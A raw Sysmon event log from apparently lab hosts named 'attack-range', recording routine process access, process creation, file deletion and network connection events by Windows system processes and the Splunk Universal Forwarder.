11:31:02.185{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-1AF6-6216-9407-000000003802}6356C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000300080Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:31:02.184{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000300079Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:31:02.183{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000300078Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:31:02.183{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000300077Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:31:02.181{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000300076Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:31:02.177{C8EA50B7-F11C-6215-0500-000000003802}412528C:\Windows\system32\csrss.exe{C8EA50B7-1AF6-6216-9407-000000003802}6356C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000300075Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:31:02.174{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-1AF6-6216-9407-000000003802}6356C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000300074Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:31:02.170{C8EA50B7-1AF6-6216-9407-000000003802}6356C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000300092Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:31:03.447{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-1AF7-6216-9507-000000003802}5628C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000300091Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:31:03.447{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000300090Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:31:03.447{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000300089Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:31:03.447{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000300088Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:31:03.447{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000300087Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:31:03.447{C8EA50B7-F11C-6215-0500-000000003802}412428C:\Windows\system32\csrss.exe{C8EA50B7-1AF7-6216-9507-000000003802}5628C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000300086Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:31:03.447{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-1AF7-6216-9507-000000003802}5628C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000300085Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:31:03.449{C8EA50B7-1AF7-6216-9507-000000003802}5628C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000300084Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:31:03.416{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A6C88796A17A65475FA276A3E45B7CD9,SHA256=548F14C0598CDD3F69F7E79F05186A02C8797BFD905C77B08642AD74E4E73E56,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000223879Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:31:00.621{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51815-false10.0.1.12-8000- 23542300x8000000000000000223878Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:31:03.194{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2B32905DC4CABC7882D3300616C0FF3D,SHA256=48449F66FD33A26F07B9719BA4CADF678B61E626AB1BBA019B05D648535A77FE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000300093Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:31:04.417{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2EB88CEA9BAE4F92B99011A67AC2C427,SHA256=4D0B2AE9A131E7C95E6A4427150C77481D67A48D5C5FF1D46874EEB225944881,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000223880Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:31:04.413{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=81BE7F039410EBB845EB77C5931EBFA4,SHA256=B5C353685718404CAFA1394813DF30554A4E83D6375C18C62A8E86BBE938A0EC,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000300096Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:31:03.640{C8EA50B7-F11D-6215-0B00-000000003802}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local49688-true0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local389ldap 354300x8000000000000000300095Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:31:03.640{C8EA50B7-F130-6215-2C00-000000003802}2420C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local49688-true0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local389ldap 23542300x8000000000000000300094Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:31:05.432{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=305E1C4F8719618ACE96DF4FC4135349,SHA256=D5D05517A6617E637DD4DABFDEE0DA7754BD97A375BFAA1077E853A23B0C668B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000223881Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:31:05.444{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=89F2D7251C12ED06DB9B7E71340CB1DD,SHA256=FE5450560BBFD6E078A13F73380BDC00689A2491473BC62857F53213ADBFDA14,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000300097Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:31:06.447{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0DFEF1127CDB1FAF541BD106CBED23B4,SHA256=C4C375C103ACBF1CFC71E0E743B1A0D52DF191938CD1B85B99833449B099DC70,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000223882Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:31:06.584{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=79AE0FAFFCE6BDB966DD237965E04F67,SHA256=970E6DC5EACF8203AF6DA05BF61E75E42916950D43C640284A09B1F83BCFB9FC,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000223884Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:31:05.652{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51816-false10.0.1.12-8000- 23542300x8000000000000000223883Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:31:07.600{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5CEFA7621F7ED346AABA687049DC6170,SHA256=F5EEA5D533FC534E70A26DB5A2343DE2E53C78A0DEFDC514CD4F8DE8A97B5EA6,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000300099Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:31:05.691{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49689-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000300098Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:31:07.481{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7B417988EA1E5D7D1610163B5A3E35EE,SHA256=AB1B6082DD27734A7A0A3BDF87BAB06A6093AF7CD50418960CD2E6F86A23B3E0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000300100Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:31:08.500{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5184287EA5040D4C9218DDEFAC69B179,SHA256=DFE6396A86080DE82CE32AF2380A69F11F9648D9470EA1AEA88E00A2197FCB10,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000223885Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:31:08.615{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A3DAA56C7BBCC4A2696685C43D20121D,SHA256=60EE31B96023DE89786A202DEF494C8879AB1A4B0A27087A4AD3F15C95120CA1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000300101Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:31:09.514{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CF0D84C00D31500B4B9EF381CB0326C8,SHA256=69D7EB238D1D23B5A9D4B2D94668764F200E22AD917784A95822CE37FDCD4F6C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000223886Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:31:09.631{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=70BBA61BCA9B5C941AC5A46A0058A5F3,SHA256=4ECCF3AF911B9765316A34FB0395561A89CBBA68D1AE740B2616D6BB56898004,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000223887Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:31:10.646{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=02827A4BFA030BF958C63A1FBFE44A83,SHA256=D76D5FEDC13724DC341728C9F9E86994265204848F87A789D4F3AC44DC2884C5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000300102Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:31:10.544{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9E9AD7116124D63CA292DCDBC3458055,SHA256=5949F3D1EDAAF30CCA0304C0C89F578101383A655F963B27D3538ACE50BDD7D2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000223888Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:31:11.662{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2AD5C08CD3664B12052A3273A865D0EE,SHA256=3D8DD9FB934AA0237FCA37793706E0FE136A1B444BB581E8CE1C1009E2F84B2F,IMPHASH=00000000000000000000000000000000falsetrue 